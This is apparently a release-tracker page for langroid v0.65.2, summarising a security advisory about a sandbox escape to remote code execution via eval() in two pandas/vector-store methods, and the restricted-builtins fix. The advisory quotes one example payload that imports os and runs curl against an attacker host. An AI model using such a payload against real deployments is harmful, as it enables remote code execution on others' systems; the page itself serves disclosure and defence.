langroid

v0.65.2 Security

This release includes 1 security fix for security teams reviewing exposed deployments.

Published 3d AI Agents & Assistants

View tool

✓ No known CVEs patched

Read the diff → Tool health → What is this tool? →

This release patches 1 known CVE

Topics

agents ai chatgpt function-calling llm gpt-4

+10 more

gpt4 information-retrieval language-model llama llm-agent llm-framework local-llm multi-agent-systems openai-api retrieval-augmented-generation

Affected surfaces

rce_ssrf

ReleasePort's take

Moderate signal

editorial:auto 3d

Version 0.65.2 patches a critical sandbox‑escape RCE in TableChatAgent.pandas_eval and VectorStoreBase.compute_from_docs by restricting eval globals.

Why it matters: CVE severity is critical (severity 100); all deployments using these APIs must upgrade immediately to prevent remote code execution.

Summary

AI summary

Critical sandbox-escape RCE fixed in TableChatAgent.pandas_eval and VectorStoreBase.compute_from_docs via restricted builtins

Changes in this release

Type	Severity	Summary	CVE
Security	Critical	Patches critical sandbox-escape RCE in TableChatAgent.pandas_eval and VectorStoreBase.compute_from_docs via restricted eval globals. Patches critical sandbox-escape RCE in TableChatAgent.pandas_eval and VectorStoreBase.compute_from_docs via restricted eval globals. Source: llm_adapter@2026-06-09 Confidence: high	—
Breaking	High	Restricts eval'd expression builtins to a curated safe set, breaking code that relied on full Python builtins (e.g., __import__, open). Restricts eval'd expression builtins to a curated safe set, breaking code that relied on full Python builtins (e.g., __import__, open). Source: llm_adapter@2026-06-09 Confidence: high	—

Full changelog

0.65.2 — Security release

A critical security patch closing a sandbox-escape → RCE in TableChatAgent.pandas_eval and VectorStoreBase.compute_from_docs. Upgrading is strongly recommended for anyone using either of these with full_eval=True, or with any LLM-influenced expression input.

pip install -U langroid

Security fix

Sandbox escape to RCE via incomplete `eval()` mitigation

Advisory: GHSA-q9p7-wqxg-mrhc — Critical (CVSS 10.0), CWE-94

Both TableChatAgent.pandas_eval and VectorStoreBase.compute_from_docs called eval(code, vars, {}) on the LLM-generated expression. The empty locals={} looked sandboxed, but because the vars globals dict had no __builtins__ entry, Python implicitly injected the full builtins module during execution. That meant a payload like

__import__('os').system('curl http://attacker.com/pwned')

executed and yielded remote code execution on the host whenever full_eval=True was set — exactly the boundary full_eval was meant to opt into "trusted input only," but the misleading-looking empty locals gave a false sense of containment.

Fix: a new safe_eval_globals(local_vars) helper in langroid/utils/pandas_utils.py returns a globals dict whose __builtins__ is restricted to a curated read-only set — constants (True, False, None) plus a small set of safe builtins (abs, all, any, bool, dict, enumerate, float, int, len, list, max, min, range, reversed, round, set, sorted, str, sum, tuple, zip). Both eval call sites now wrap their globals via this helper, so __import__, eval, exec, open, compile, globals, vars, getattr and friends are no longer reachable from inside the eval'd expression — even with full_eval=True.

This is in addition to (not instead of) sanitize_command, which continues to gate the default full_eval=False path with its strict AST whitelist (DataFrame-only attribute access, dunder/private attribute blocking, method allowlist, ...).

Reported by @YLChen-007.

Behavior change

Strictly tighter — the eval'd expression no longer has access to Python builtins outside the curated safe set. Typical pandas expressions (df.shape, df.groupby(...).mean(), len(df), sum(df['x']), round(...), etc.) continue to work unchanged. If your application legitimately relied on calling __import__, open, exec, etc. from inside a pandas expression (which it should not), you will now get a NameError.

full_eval=True remains documented as "use only on trusted input" — this release closes the direct __import__-style RCE primitive that previously made that opt-in much more dangerous than it appeared.

Upgrade

pip install -U langroid

Full changelog: 0.65.1...0.65.2

Security Fixes

GHSA-q9p7-wqxg-mrhc — Critical (CVSS 10.0) sandbox‑escape RCE in TableChatAgent.pandas_eval and VectorStoreBase.compute_from_docs; restricted __builtins__ to a safe subset

View diff on GitHub

Weekly OSS security release digest.

The CVE patches and breaking changes that affected production tools this week. One email, every Sunday.

No spam, unsubscribe anytime.

Share this release

Share on X Share on Bluesky

Track langroid

Get notified when new releases ship.

About langroid

Harness LLMs with Multi-Agent Programming

All releases →

Related context

Related tools

Earlier breaking changes

v0.65.3 Raw user messages containing tools registered with `enable_message(..., use=False, handle=True)` are now dropped instead of executed.
v0.65.1 Rejects additional PostgreSQL-specific obfuscations of dangerous functions like `pg_read_file` in `SQLChatAgent`.
v0.65.0 Default PDF parser switched from pymupdf4llm to pypdfium2; AGPL dependency removed.
v0.64.0 Rejects PostgreSQL/SQLite/MSSQL primitives that enable arbitrary file reads.
v0.64.0 Restricts file‑tool paths to stay within configured `curr_dir`.